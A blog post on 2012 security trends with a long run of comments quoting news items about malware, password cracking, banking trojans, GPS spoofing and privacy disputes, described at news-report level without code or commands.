Here is my collection of security trends for 2012 from different sources:
Windows XP will be the biggest security threat in 2012 according to Sean Sullivan, security advisor at F-Secure: “People seem to be adding new systems without necessarily abandoning their old XP machines, which is great news for online criminals, as XP continues to be their favourite target.”
F-Secure also says also that it might not be long before the cyber criminals turn their attentions to tablet devices. Attacks against mobile devices have become more common and I expect this to continue this year as well.
Americans more susceptible to online scams than believed, study finds. A recent survey from The Ponemon Institute and PC Tools dives into this question and reveals a real gap between how aware Americans think they are of scams and how likely they actually are to fall for them.
Fake antivirus scams that have plagued Windows and Mac OSX during the last couple of years and now it seems that such fake antivirus scams have spread to Android. Nearly all new mobile malware in Q3 2011 was targeted at Android.. When antivirus software becomes a universally accepted requirement (the way it is on Windows is the day), has the platform has failed and missed the whole point of being mobile operating system?
Cyber criminals are developing more sophisticated attacks and the police will counterattack.
Mobile phone surveillance will increase and more details of it will surface. Last year’s findings have included Location data collecting smart-phones, Carrier IQ phone spying busted and Police Surveillance system to monitor mobile phones. In USA the Patriot Act lets them investigate anything, anywhere, without a warrant. Now they are on your devices and can monitor everything. Leaked Memo Says Apple Provides Backdoor To Governments: “in exchange for the Indian market presence” mobile device manufacturers, including RIM, Nokia, and Apple (collectively defined in the document as “RINOA”) have agreed to provide backdoor access on their devices.
Geo-location tagging in smartphones to potentially cause major security risks article says that geo-location tagging security issues are likely to be a major issue in 2012—and that many users of smartphones are unaware of the potentially serious security consequences of their use of the technology. When smartphones images to the Internet (to portals such Facebook or Flickr) there’s a strong chance they will also upload the GPS lcoation data as well. This information could be subsequently misused by third parties.
You need to find your balance between freedom and security (
Vapauden ja turvallisuuden tasapaino). Usernames poured out for all to see, passwords and personal identification numbers are published. A knowledge of access management is even more important: who has the right to know when and where the role of functioning? Access, identity and role management are essential for the protection of the whole system. Implementation of such systems is still far from complete.
When designing networked services, the development of safety should taken into account in the planning stage, rather than at the end of execution. Even a secure network and information system can not act as operating a vacuum.
Reliability of the server certificates will face more and more problems. We can see more certificate authority bankruptcies due cyber attacks to them. Certificate attacks that have focused on the PC Web browsers, are now proven to be effective against mobile browsers.
Stonesoft says that advanced evasion techniques (AET) will be a major threat. Stonesoft discovered that with certain evasion techniques (particularly when combined in particular combinations) they could sneak common exploits past many IDS/IPS systems (including their own, at the time last summer). Using the right tool set (including a custom TCP/IP stack) attackers could sneak past our best defenses. This is real and they foresee a not too distant future where things like botnet kits will have this as a checkbox feature.
Rise of Printer Malware is real. Printer malware: print a malicious document, expose your whole LAN says that sending a document to a printer that contained a malicious version of the OS can send your sensitive document anywhere in Internet. Researchers at Columbia University have discovered a new class of security flaws that could allow hackers to remotely control printers over the Internet. Potential scenario: send a resume to HR, wait for them to print it, take over the network and pwn the company. HP does have firmware update software for their printers and HP Refutes Inaccurate Claims; Clarifies on Printer Security. I wonder how many more years until that old chain letter, where some new insidious virus infects everything from your graphics card to your monitor cable, becomes true.
Unauthorized changes in the BIOS could allow or be part of a sophisticated, targeted attack on an organization, allowing an attacker to infiltrate an organization’s systems or disrupt their operations. How Do You Protect PCs from BIOS Attacks? The U.S. National Institute of Standards and Technology (NIST) has drafted a new computer-security publication that provides guidance for computer manufacturers, suppliers, and security professionals who must protect personal computers as they start up “out of the box”: “BIOS Integrity Measurement Guidelines,” NIST Special Publication 800-155.
According to Stonesoft security problems threaten the lives and the year 2012 may be the first time when we lose lives because of security offenses. According to the company does this happen remains to be seen, but the risk is due to industrial SCADA systems attacks against targets such as hospitals or automated drug delivery systems. I already posted around month ago about SCADA systems security issues.
849 Comments
Tomi Engdahl says:
Managing Your Network Security
http://www.datacenterjournal.com/it/managing-your-network-security/
Like it or not, a critical task for your company’s success is proper management of your network security. The question is not if a malicious party will attack your IT infrastructure, but when—and that means you must take measures to prepare for and, hopefully, thwart such attacks. This effort takes time and money, but so does the alternative. When a hacker, for instance, steals confidential information (say, about customers), not only is your company’s reputation harmed, resulting in lost business, but you may also face fines or other costs associated with regulatory compliance. And this says nothing about subsequent efforts to repair any damage that might have been caused to the network or data contained therein.
The critical first step of managing your network security is recognizing what exactly is threatened by malicious software and third parties
Communications with other networks and users—such as your customers—can be great for business, but it opens your network to a host of remote threats. Attacks on your network from the Internet may involve attempts at intrusion, malware such as worms and spyware, or denial of service (DoS) via floods of “garbage” requests. In this case, some helpful tools are antivirus software (encompassing virus, spyware, rootkits and all the other myriad malicious devices used by attackers), a strong firewall, intrusion prevention and DoS mitigation. Already, you may realize you have a significant task ahead of you in protecting your network, but there’s more.
Direct attacks on your network are not the only threat. You must also protect communications when they leave your company network on their way to customers or other networks (say, a remote company site). To this end, virtual private networks and encryption help prevent intercepted messages from being read or convincingly altered. Protocols like SSL and IPSec help secure connections to prevent spoofing and other attacks.
And don’t forget to secure your wireless connections. An unsecured wireless router can give anyone with a laptop and a wireless card access to your network regardless of your security measures on the hard-wired front.
Unfortunately, there’s still more. If you have all the above covered, you can still be vulnerable if, say, an employee loses a device such as a USB drive or smartphone—particularly if it’s a BYOD (bring your own device) gadget.
A Helpful Management Tool: Clear Security Policies
Perhaps the greatest chink in any network security armor is the human factor. An employee opening a suspicious attachment (like those ones from the accounting department with the spreadsheet you supposedly requested) can easily nullify thousands of dollars of investment in network security
Forward Thinking
One of the keys to successfully securing your network is to do more than just respond to attacks: you must continually update your antivirus software (as well as other applications) to stay up to date with the latest threats, but you should also consider analytics of traffic entering or leaving your network, as this can indicate areas of weakness or even a compromised portion of the network.
Cloud Security
Many companies are turning to the cloud to supplement their existing IT infrastructure. Whether this is your approach or you are making a more wholesale move to the cloud, security should be a top concern. The cloud is not necessarily more inherently unsecure than on-premises infrastructure, but the level of security can and does vary from provider to provider.
Tomi Engdahl says:
Java Zero-Day Exploit on Sale for ‘Five Digits’
http://krebsonsecurity.com/2012/11/java-zero-day-exploit-on-sale-for-five-digits/
Miscreants in the cyber underground are selling an exploit for a previously undocumented security hole in Oracle’s Java software that attackers can use to remotely seize control over systems running the program, KrebsOnSecurity has learned.
The flaw, currently being sold by an established member of an invite-only Underweb forum, targets an unpatched vulnerability in Java JRE 7 Update 9, the most recent version of Java (the seller says this flaw does not exist in Java 6 or earlier versions).
According to the vendor, the weakness resides within the Java class “MidiDevice.Info,” a component of Java that handles audio input and output.
The price of any exploit is ultimately whatever the market will bear, but this is roughly in line with the last Java zero-day exploit that was being traded and sold on the underground.
In August, I wrote about a newly discovered Java exploit being folded into the BlackHole exploit kit, quoting the author of that crimeware tool as saying that “the price of such an exploit if it were sold privately would be about $100,000.”
Bruce Vanfleet says:
What’s up, all the time i used to check blog posts here in the early hours in the break of day, because i love to find out more and more.|
Tomi Engdahl says:
Hack could let browsers use cloud to carry out big attacks on the cheap
Exploit abuses cloud services to do large-scale computations.
http://arstechnica.com/security/2012/11/hack-could-let-browsers-use-cloud-to-carry-out-big-attacks-on-the-cheap/
Scientists have devised a browser-based exploit that allows them to carry out large-scale computations on cloud-based services for free, a hack they warn could be used to wage powerful online attacks cheaply and anonymously.
The method, described in a research paper scheduled to be presented at next month’s Computer Security Applications Conference, uses the Puffin mobile browser to push computationally intensive jobs onto a cloud-based service that was never intended for such purposes. Normally, Puffin and other so-called cloud-based browsers are used only to accelerate the loading of Web pages on mobile devices by rendering JavaScript, images, and text from disparate sources on a server and only then delivering it to the smartphone or tablet. That’s more efficient than relying on mobile devices with limited computing power to render such content themselves.
“By rendering Web pages in the cloud, the providers of cloud browsers can become open computation centers, much in the same way that poorly configured mail servers become open relays,” the scientists wrote in the paper. “The example applications shown in this paper were an academic exercise targeted at demonstrating the capabilities of cloud browsers. There is great potential to abuse these services for other purposes.”
While their proof-of-concept attack abuses the Puffin service for Android and iOS devices, they say similar cloud infrastructure is also vulnerable, including services that work with Amazon’s Silk browser for Kindle devices, Cloud Browse from AlwaysOn Technologies, and Opera Mini.
The exploit works by breaking up jobs into large numbers of much smaller jobs and feeding them to multiple instances of their custom-made browser, which then push them into the cloud. To make the job easier, they created code libraries modeled on MapReduce, a Google-designed programming framework for performing distributed computing on large clusters of computers. Their JavaScript-based code broke up large tasks into much smaller tasks and then distributed them to individual browser instances. They relied on the free Bitly URL shortening service to allow one task to share data with another. A similar process was then used to reassemble the completed jobs and deliver the results from the servers back to their browser.
The researchers said cloud browser providers are already taking steps to prevent abuse on their services, but that more needs to be done. They wrote: “Based on our findings, we observe that the computational ability made freely available by cloud browsers allows for an open compute center that is valuable and warrants substantially more careful protection.”
Tomi Engdahl says:
Burglar suspected of using Arduino-Onity hack to rob hotel rooms
http://hackaday.com/2012/11/29/burglar-suspected-of-using-arduino-onity-hack-to-rob-hotel-rooms/
Can anyone argue against this being the least-secure hotel room lock on the market? Regular readers will recognize it as an Onity key card lock. A few months back a glaring flaw in the security was exposed that allows these locks to be opened electronically in less than a second. So we are not surprised to hear that a series of hotel room robberies in Houston are suspected to have been performed using this technique.
She said that if there’s a vulnerability that’s not being fixed people have a right to know about it.
Tomi Engdahl says:
The Bluejacking, Bluesnarfing, Bluebugging Blues: Bluetooth Faces Perception of Vulnerability
http://www.eetimes.com/design/communications-design/4017819/The-Bluejacking-Bluesnarfing-Bluebugging-Blues-Bluetooth-Faces-Perception-of-Vulnerability
Is Bluetooth secure? Inquiring minds want to know. Ever since the first Bluetooth-enabled mobile phones started appearing a couple of years ago, numerous reports have suggested that the wireless technology is vulnerable to snooping.
First, the popular press jumped onto bluejacking, which lets complete strangers send anonymous and unsolicited messages to certain Bluetooth phones. Then came reports that some phones were vulnerable to bluesnarfing, which makes it possible for someone to access a phone wirelessly without the owner’s knowledge and download the stored phonebook and calendar and sometimes more. More recently, reports have described bluebugging, in which someone can theoretically take complete wireless control of virtually any Bluetooth phone and use it for all kinds of illicit purposes.
What the articles don’t tell you, though, is just how unlikely it is for any of these bluesomething attacks to affect you. Some early Bluetooth phones did have some security holes, but they were due to faulty implementations, not Bluetooth weaknesses, and the phones’ manufacturers have since released firmware upgrades that fix them.
This isn’t to say, of course, that Bluetooth is absolutely, totally secure. The jury is still out, actually, on just how secure Bluetooth is.
One thing that has become clear, though, is that Bluetooth security and user convenience involve some serious tradeoffs
Vulnerable?
So, then, Bluetooth’s vulnerability comes down to a few key points:
Early, faulty Bluetooth implementations, since corrected.
Users choosing short PINs that are easy to crack with brute-force computing.
Users unwisely pairing Bluetooth devices in public places.
Motivated, dedicated privacy snoops willing and able to use special, and sometime expensive, hardware and software.
And, of course, user convenience. It’s easier for users to leave Bluetooth turned on and discoverable. It’s easier to use a short PIN than a long one.
But users concerned about security will give up a little convenience to get it. And, increasingly, manufacturers of Bluetooth phones, understanding the tradeoff between security and convenience, will design their phones in ways that push users toward security. They don’t want to be accused of marketing vulnerable technology, after all. They’ve had enough of that already.
Tomi Engdahl says:
Stockholm stock exchange paralyzed by order for -6 futures
http://www.geek.com/articles/geek-cetera/stockholm-stock-exchange-paralyzed-by-order-for-6-futures-20121129/
Stock exchange systems around the world rely on computers and their ability to handle orders quickly, and more importantly, correctly. However, on Wednesday the Stockholm Stock Exchange was brought to a grinding halt by an order for -6 futures (which could be an order for stocks, bonds, or currency, for example).
That’s clearly a mistake on someone’s part, but surely the stock exchange system should have been able to cope, and why did it cause such a big problem?
My understanding of it is this: the reason boils down to how the system reacts to a negative number. It will attempt to convert -6 into a positive number it can then use to trade with. The problem is, -6 gets changed to 4,294,967,290 when converted to an unsigned integer.
the cost of the transaction to the buyer would be about $460 trillion. That’s many times the gross domestic product of Sweden
The stock exchange managed to get back online a day later on Thursday, with the problem being described as a technical error. But this just goes to show, while we rely on c0omputers heavily, it only takes the simplest of errors to break them.
Tomi Engdahl says:
Who’s using ‘password’ as a password? TOO MANY OF YOU
Study of hacked websites reveals top 25 common passphrases
http://www.theregister.co.uk/2012/12/03/lame_passwords_still_rife/
A study to find the top 25 leaked passwords of 2012 has revealed too many people are still using “password”, “123456″ and “12345678″ for their login credentials.
Mobile security biz SplashData’s roundup put “123456″ in the number two slot for 2012; the same password was used by 37 per cent of all user accounts at the Anonymous-hacked Greek finance ministry.
Tomi Engdahl says:
MySQL gains new batch of vulns
Overruns, privileges, DoS and more
http://www.theregister.co.uk/2012/12/04/mysql_new_vulns/
A series of posts on ExploitDB by an author signing as “King Cope” reveal a new set of MySQL vulnerabilities – along with one issue that could just be a configuration issue.
The vulnerabilities, which emerged on Saturday, include a denial-of-service demonstration, a Windows remote root attack, two overrun attacks that work on Linux, and one privilege escalation attack, also on Linux.
Red Hat has assigned CVEs to the vulnerabilities, but at the time of writing, Oracle has not commented on the issues.
Tomi Engdahl says:
App designed for safe sending of naughty selfies is rife with risks
Teenager subtitles: App makes selfies safe BLAH BLAH BLAH
http://www.theregister.co.uk/2012/11/08/snapchat/
A smartphone app touted as a safe way to exchange naked pictures and saucy texts poses a huge privacy risk.
Snapchat is available for both iPhone and Android devices, and is marketed towards teenagers and young adults. The app lets senders control how long a message or picture can be viewed, before it expires after a maximum of 10 seconds.
The idea is that a picture is only visible for 10 seconds – limiting the opportunity for others to forward it around the school campus, or (worse) upload it to Facebook or an image sharing site.
The problem is that this doesn’t stop anyone receiving a message taking a screenshot of their device and creating their own copy of the image, providing they are nimble fingered enough.
“A less high-tech method to grab the image is to simply take a photograph of the phone that has just received the nude photo.”
Snapchat, which received a 12+ rating from Apple for “Infrequent/Mild Sexual Content or Nudity”, is ahead of Instagram and only behind YouTube in the list of top free photography apps in Apple’s online store. The firm claims its iOS version alone has been used to shared over 1 billion photos (“snaps”).
US child safety online Mary Kay Hoal has also expressed concerns that youngsters might be fooled into thinking that Snapchat is a safe way to share nude and inappropriate photographs of themselves.
“Sharing a naked photo of yourself with someone via the internet is putting yourself at dangerous risk of embarrassment, humiliation or serious bullying,” Cluley concludes.
Tomi Engdahl says:
Want it Secure? Target Both Design and Data Security
http://rtcmagazine.com/articles/view/102841
In today’s increasingly connected world, security applies to servers as well as mobile and remote embedded devices. The latter are often exposed to physical tampering while data travelling over networks is exposed to compromise and hacking. Security depends on securing the complete connected universe.
As defense, commercial and civil network infrastructures become increasingly dependent on arrays of Internet-connected computers, they are becoming increasingly susceptible to attack from hostile nations, non-governmental terrorist groups and cyber criminals. This silent digital war’s constantly escalating cycle of intrusion/interception threats and countermeasures poses multiple challenges to designers, since adding robust security features to a design can substantially impact the complexity, power consumption and cost of a system. These challenges include supporting the computational complexity required to run advanced cryptographic algorithms; providing secure insertion and storage of encryption keys, and authenticating and encrypting data exchanged over public network connections.
Tomi Engdahl says:
Security in the Cloud
Using military-grade security technology to help protect the enterprise.
http://rtcmagazine.com/articles/view/102813
As more enterprises look to the cloud as a mechanism for both data sharing and data streaming, key concerns of security of the cloud continue to emerge, even for private and community clouds. We are moving from a distributed data model, where the attack vectors for sensitive information have been very broad but the consequence of a single attack is small, to a cloud-based approach where the attack vector is small but the impact of a single attack can be huge. Consequently, we need to establish much greater security in the cloud, especially when sensitive information or infrastructure is at risk.
Tomi Engdahl says:
New 25-GPU Monster Devours Strong Passwords In Minutes
http://it.slashdot.org/story/12/12/05/0623215/new-25-gpu-monster-devours-strong-passwords-in-minutes
“A presentation at the Passwords^12 Conference in Oslo, Norway , has moved the goalposts on password cracking yet again. Speaking on Monday, researcher Jeremi Gosney (a.k.a epixoip) demonstrated a rig that leveraged the Open Computing Language (OpenCL) framework and a technology known as Virtual Open Cluster (VCL) to run the HashCat password cracking program across a cluster of five, 4U servers equipped with 25 AMD Radeon GPUs communicating at 10 Gbps and 20 Gbps over Infiniband switched fabric. Gosney’s system elevates password cracking to the next level, and effectively renders even the strongest passwords protected with weaker encryption algorithms, like Microsoft’s LM and NTLM, obsolete.”
“Gosney’s cluster cranks out more than 77 million brute force attempts per second against MD5crypt.”
Stanley Sterger says:
These days be required to be my lucky day since I observed your situate. In fact, I was scarcely aesthetics close by this obligation this forenoon.
Tomi Engdahl says:
25 GPUs brute force 348 billion hashes per second to crack your passwords
http://hackaday.com/2012/12/06/25-gpus-brute-force-348-billion-hashes-per-second-to-crack-your-passwords/
It’s our understanding that the video game industry has long been a driving force in new and better graphics processing hardware. But they’re not the only benefactors to these advances. As we’ve heard before, a graphics processing unit is uniquely qualified to process encryption hashes quickly (we’ve seen this with bitcoin mining). This project strings together 25 GPU cards in 5 servers to form a super fast brute force attack. It’s so fast that the actual specs are beyond our comprehension. How can one understand 348 billion hashes per second?
The testing was used on a collection of password hashes using LM and NTLM protocols.
Tomi Engdahl says:
How the Eurograbber attack stole 36 million euros
http://www.net-security.org/malware_news.php?id=2344
Check Point has revealed how a sophisticated malware attack was used to steal an estimated €36 million from over 30,000 customers of over 30 banks in Italy, Spain, Germany and Holland over summer this year.
The theft used malware to target the PCs and mobile devices of banking customers. The attack also took advantage of SMS messages used by banks as part of customers’ secure login and authentication process.
The attack worked by infecting victims’ PCs and mobiles with a modified version of the Zeus trojan. When victims attempted online bank transactions, the process was intercepted by the trojan.
With victims’ PCs and mobile devices compromised, the attackers could intercept and hijack all the victims’ banking transactions, including the key to completing the transaction: the bank’s SMS to the customer containing the ‘transaction authentication number’ (TAN). With the account number, password, and TAN, the attackers were able to stealthily transfer funds out of victims’ accounts while victims were left with the impression that their transaction had completed successfully.
The attack involved 10 stages, starting with an initial infection by a modified version of Zeus
Zeus Botnet Eurograbber Steals $47 Million
http://www.informationweek.com/security/attacks/zeus-botnet-eurograbber-steals-47-millio/240143837
Sophisticated, targeted attack campaign enabled criminals to steal an estimated $47 million from more than 30,000 corporate and private banking customers.
That finding comes from a new report published by security vendors Versafe and Check Point Software Technologies. They’ve dubbed the related attack campaign as “Eurograbber,” and notified banks and law enforcement agencies in the affected countries.
The malware used by attackers is a customized version of the Zitmo Trojan spyware application. Zitmo is short for “Zeus in the mobile,” and the malware is designed to defeat the two-factor authentication systems employed by some banks. To do that, a companion, smartphone version of the malware intercepts the one-time transaction authentication number (TAN) that banks send to a customer’s mobile device, via SMS, which the customer must then enter into a banking website prompt to authorize a money transfer.
The Zitmo Trojan can infect a PC if a user clicks on a malicious link in a spam or phishing email, or on a link on a website that’s been compromised by attackers. The malicious Trojan application then remains dormant until a user logs into a targeted financial firm’s website. “The next time the bank customer logs in to their bank account, the Eurograbber Trojan intercepts their banking session and injects a JavaScript into the customer’s banking page,” according to the report. “This malicious JavaScript informs the customer of the ‘security upgrade’ and instructs them on how to proceed.”
The security upgrade page requests that the user indicated which mobile operating system their smartphone uses — Android, BlackBerry, iOS (iPhone), Symbian (Nokia) or other — as well as their mobile phone number. This information is then relayed to a drop zone, which is a publicly writable folder on a Web server — which attackers may have previously hijacked — where they store information about every infected bank customer’s PC, including account numbers, log-in credentials, and one-time passwords.
Inside Eurograbber: How SMS Was Used to Pilfer Millions
http://www.esecurityplanet.com/malware/inside-eurograbber-how-sms-was-used-to-pilfer-millions.html
The Eurograbber Trojan employs a feature designed to help users feel more secure about their online banking to rip them off.
In one of the most sophisticated banking attacks ever publicly reported, over 36 million euros ($47 million U.S.) were stolen from at least 30,000 banking customers across Europe. The attack, dubbed “Eurograbber,” leveraged mobile platforms and a variant of the Zeus platform to do its dirty work.
Darrell Burkey, director of IPS at security vendor Check Point, explained to eSecurity Planet that the attack was a multi-stage process designed to work within the context of online banking in Europe. Many European banks leverage a two factor authentication approach for logging into their online portals. In addition to a standard password, an SMS message is typically sent to the user providing the required second factor for authentication.
“The bank customer has some level of comfort because they initiated the activity by going to their banking website, which is where the alert popped up,” Burkey said. “The Trojan requests that the user provides their mobile phone number in order to complete a required upgrade.”
A user who falls for the ruse and provides the mobile phone number will then receive an SMS on their phone, purportedly from their bank. That SMS directs the user to click a link which downloads a Zeus mobile Trojan.
“At that point the user is basically owned, and the next time they access their bank account the attack initiates a transaction to transfer money out of the account to the attacker’s account,” Burkey said.
The Eurograbber attack was discovered by Check Point and security vendor vendor Versafe after their customers were hit by the attack. Eyal Gruner, security engineer at Versafe, told eSecurity Planet that when the Eurograbber attempted to inject code into a banking website used by customers of theirs, an alert was triggered.
Tomi Engdahl says:
Apple Hires Hacker Who Helped Save Windows From Security Hell
http://www.wired.com/wiredenterprise/2012/12/apple-hires-hacker/
Apple has hired a noted computer security researcher who helped Microsoft lock down its Windows operating system.
Kristin Paget — formerly known as Chris Paget — now works on Apple’s security team. Just over five years ago, she was part of a small team of elite hackers brought in by Microsoft to lock down Windows Vista.
Criminals have long preferred to focus their attacks on Microsoft’s operating system — still the world’s most popular — but lately, there have been signs that they’re eying Apple’s Mac OS X too. And Apple, slowly, has been trying to make inroads into the security community. This summer, an Apple engineer spoke at the Black Hat security conference for the first time.
Until this past summer, Paget had been chief hacker at Recursion Ventures, a company that specializes in hardware security.
Tomi Engdahl says:
Kill the Password: Why a String of Characters Can’t Protect Us Anymore
http://www.wired.com/gadgetlab/2012/11/ff-mat-honan-password-hacker/
It’s not a well-kept secret, either. Just a simple string of characters—maybe six of them if you’re careless, 16 if you’re cautious—that can reveal everything about you.
Your email. Your bank account. Your address and credit card number. Photos of your kids or, worse, of yourself, naked. The precise location where you’re sitting right now as you read these words. Since the dawn of the information age, we’ve bought into the idea that a password, so long as it’s elaborate enough, is an adequate means of protecting all this precious data. But in 2012 that’s a fallacy, a fantasy, an outdated sales pitch. And anyone who still mouths it is a sucker—or someone who takes you for one.
No matter how complex, no matter how unique, your passwords can no longer protect you.
Tomi Engdahl says:
Windows XP can retire – or not?
Windows XP: The future raises different opinions among experts.
Windows XP was published in 2001 and support for it is announced to end in April 2014 kuopata. After that it will not no longer get any security and other updates.
Some security researchers forecast that Microsoft implemented its intentions, even if it would jeopardize the security of millions of customers. Others are of the opinion that the company does not plan to, despite no choice but to continue to support the product.
XP support ending the worst case could cause major problems for the entire internet. Such an example would be a massive denial of service attack, which in turn would force Microsoft to publish a correction, despite the expiry of the due date.
“It would be a huge blow to the image of Microsoft’s Security”
Gartner’s John Pescatore, the border must be drawn somewhere, after all, Microsoft support XP on more than anything else.
“I do not think they change their mind. If they did that, they would lose all credibility.”
Pescatore sees one possible reason why this support would be extended – and is not related to information security, but Windwos-shrinking share of the equipment:
“They can continue to update the publication, in order to obtain kept closed, even those customers who are using XP.”
Source: http://www.tietoviikko.fi/kaikki_uutiset/windows+xp+paasee+elakkeelle++tai+sitten+ei/a862063?s=r&wtm=tietoviikko/-07122012&
Tomi Engdahl says:
Assessing the Effectiveness of Antivirus Solutions
http://www.imperva.com/docs/HII_Assessing_the_Effectiveness_of_Antivirus_Solutions.pdf
In 2012, Imperva, with a group of students from The Technion – Israeli Institute of Technology, conducted a study of more than 80
malware samples to assess the effectiveness of antivirus software.
Based on our review, we believe:
1. The initial detection rate of a newly created virus is less than 5%. Although vendors try to update their detection
mechanisms, the initial detection rate of new viruses is nearly zero. We believe that the majority of antivirus products on the
market can’t keep up with the rate of virus propagation on the Internet.
2. For certain antivirus vendors, it may take up to four weeks to detect a new virus from the time of the initial scan.
3. The vendors with the best detection capabilities include those with free antivirus packages, Avast and Emisoft,
though they do have a high false positive rate.
To be clear, we don’t recommend eliminating antivirus.
Tomi Engdahl says:
Pakistan Cyber Army declares war on Chinese, Bangladeshi sites
Hacktivists go on web defacement spree
http://www.theregister.co.uk/2012/12/10/pakistan_cyber_army_hack_bangladesh_china/
Hacktivists claiming to hail from the Pakistan Cyber Army have defaced over 400 Chinese government web sites and also hit in excess of 20 Bangladeshi government sites.
A hacker known as ‘Code Cracker’ is claiming responsibility for the attack on the official web site of Xuchang City People’s Procuratorate and a whopping 436 sub-domains, according to HackRead.
The domains were posted to hackers’ favourite Pastebin and all now appear to have been taken offline
The Pakistan Cyber Army are among the more prolific hacktivist groups from the region, with India targets a particular favourite
Tomi Engdahl says:
Researchers find crippling flaws in global GPS
http://www.scmagazine.com.au/News/325731,researchers-find-crippling-flaws-in-global-gps.aspx
Researchers have developed three attacks capable of crippling Global Positioning System infrastructure critical to the navigation of a host of military and civilian technologies including planes, ships and unmanned drones.
The scenarios developed include novel remote attacks via malicious GPS broadcasts against consumer and professional- grade receivers which could be launched using $2500 worth of equipment.
A 45-second crafted GPS message could bring down up to 30 percent of the global GPS Continuously Operating Reference Stations (CORS), while other attacks could take down 20 percent of NTRIP networks, security boffins from Carnegie Mellon University and firm Coherent Navigation wrote in a paper
Together, attack scenarios created “serious ramifications to safety systems”.
“Until GPS is secured, life and safety-critical applications that depend upon it are likely vulnerable to attack,” the team of four researchers said
“The good news is that as far as we know, we are the only ones with a spoofing device currently capable of the types of attacks,” Nighswander said.
“The bad news is that our spoofer would not be prohibitively expensive and complicated for someone to build, if they had the proper skillset.
Attacks were conducted against seven receiver brands including Magellan, Garmin, GlobalSat, uBlox, LOCOSYS and iFly 700.
Trimble was working with researchers to push out a patch for its affected products, Nighswander said.
Attacks included location spoofing in applications used by planes, cars, trucks and ships to prisoner ankle bracelets, mobile phone towers, traffic lights, and SCADA systems.
The researchers said their work differed from existing GPS jamming and spoofing attacks because it detailed a larger attack surface “by viewing GPS as a computer system”. This included analysis of GPS protocol messages and operating systems, the GPS software stack and how errors affect dependent systems.
“The overall landscape of GPS vulnerabilities is startling, and our experiments demonstrate a significantly larger attack surface than previously thought,” the researchers wrote.
“For example, we show that we can permanently de-synchronise the date of Phasor Measurement Units used in [a] smart grid. We also show we can cause UNIX epoch rollover in a few minutes, and year 100,000 (the first 6-digit year) rollover in about two days.”
Tomi Engdahl says:
Ubuntu Spyware: What to Do?
http://www.fsf.org/blogs/rms/ubuntu-spyware-what-to-do
One of the major advantages of free software is that the community protects users from malicious software. Now Ubuntu GNU/Linux has become a counterexample. What should we do?
Proprietary software is associated with malicious treatment of the user: surveillance code, digital handcuffs (DRM or Digital Restrictions Management) to restrict users, and back doors that can do nasty things under remote control. Programs that do any of these things are malware and should be treated as such. Widely used examples include Windows, the iThings, and the Amazon “Kindle” product for virtual book burning, which do all three;
Ubuntu, a widely used and influential GNU/Linux distribution, has installed surveillance code. When the user searches her own local files for a string using the Ubuntu desktop, Ubuntu sends that string to one of Canonical’s servers. (Canonical is the company that develops Ubuntu.)
This is just like the first surveillance practice I learned about in Windows.
Ubuntu uses the information about searches to show the user ads to buy various things from Amazon.
However, the ads are not the core of the problem. The main issue is the spying. Canonical says it does not tell Amazon who searched for what. However, it is just as bad for Canonical to collect your personal information as it would have been for Amazon to collect it.
People will certainly make a modified version of Ubuntu without this surveillance. In fact, several GNU/Linux distros are modified versions of Ubuntu. When those update to the latest Ubuntu as a base, I expect they will remove this. Canonical surely expects that too.
Canonical has not abandoned the Ubuntu spyware. Perhaps Canonical figures that the name “Ubuntu” has so much momentum and influence that it can avoid the usual consequences and get away with surveillance.
Ubuntu allows users to switch the surveillance off. Clearly Canonical thinks that many Ubuntu users will leave this setting in the default state (on). And many may do so, because it doesn’t occur to them to try to do anything about it. Thus, the existence of that switch does not make the surveillance feature ok.
Tomi Engdahl says:
Amazon search results in the Dash
http://www.markshuttleworth.com/archives/1182
It makes perfect sense to integrate Amazon search results in the Dash, because the Home Lens of the Dash should let you find *anything* anywhere. Over time, we’ll make the Dash smarter and smarter, so you can just ask for whatever you want, and it will Just Work.
Tomi Engdahl says:
Mobile certificate may be applied for the wrong personal data
Electronic identification used in mobile certificate may apply to the operator on the wrong personal information without consequences, tells Finnish Ministry of the Interior.
This is due to the fact that identity theft as such is not a criminal offense in Finland.
Counselor Johanna Kari sees a contradiction in the way the certification authorities are treated. Providing false personal data to the authorities is a crime, but providing false information to a private operator, such as telecom operator is not.
“Operators are actually hoped for the criminalization of identity theft. Operators are experiencing a gap in it, that they may attempt to deceive, but the authorities do not.”
The danger is that the information from the certificate can be used to identify a person.
Use of the mobile identification certificates is rising, so the identification system should be improved to be proof.
“Although the presentation of false personal data to the operator is not a crime, using the resulting invalid tag is,” emphasizes business leader Henri Korpi, Elisa.
“If the tag is used to try to deceive even the co-contractor, it is very often fraudulent.”
Source: http://www.3t.fi/artikkeli/uutiset/teknologia/mobiilivarmennetta_saa_haettua_vaarilla_henkilotiedoilla
Tomi Engdahl says:
That square QR barcode on the poster? Check it’s not a sticker
Crooks slap on duff codes leading to evil sites
http://www.theregister.co.uk/2012/12/10/qr_code_sticker_scam/
Cybercrooks are putting up stickers featuring URLs embedded in Quick Response codes (QR codes) as a trick designed to drive traffic to dodgy sites.
QR codes are two-dimensional matrix barcode that can be scanned by smartphones that link users directly to a website without having to type in its address. By using QR codes (rather than links) as a jump-off point to dodgy sites, cybercrooks can disguise the ultimate destination of links.
Security watchers have already seen spam messages pointing to URLs that use embedded QR codes. Now crooks have gone one step further by printing out labels and leaving them in well trafficked locations.
“There has been an explosion in the number of QR codes over the last couple of years, and cybercriminals are taking full advantage. Because QR codes just look like pictures it’s extremely difficult to tell if they’re genuine or malicious, making it easy to dupe passers-by into scanning codes that may lead to an infected site, or perhaps a phishing site.”
Tomi Engdahl says:
Tor node admin raided by cops appeals for help with legal bills
http://www.theregister.co.uk/2012/12/10/tor_admin/
A sysadmin had his flat raided and equipment seized by police last week for hosting a Tor exit node
William Weber from Graz, Austria, was questioned by cops after someone allegedly distributed child abuse images over one of the Tor exits he administered.
Tor (The Onion Router) offers, among other things, anonymised web browsing and has many legitimate applications including getting around censorship controls in countries with a poor human rights record. Tor routes traffic through a number of relay nodes before delivering the packets to their final destination, confusing attempts to figure out where traffic originated. Volunteers such as Weber administer “exit nodes” – the final stepping stone on the network.
The system is used by journalists, activists and military organisations around the world to bypass censorship and communicate securely. Like any technology Tor can also lend itself to unsavoury applications.
This leaves anyone providing hardware to the Tor project in a difficult position.
“Tor admins should open a LLC (if US) or Limited (in UK, if EU) or registered partnership/non-profit (German Verein, if in Germany) company as owner of these servers,” Weber said. “This removes the hassle of running it as private person and remove at least a bit liability (in most countries) if not all of it (in Germany, Telemediengesetz).”
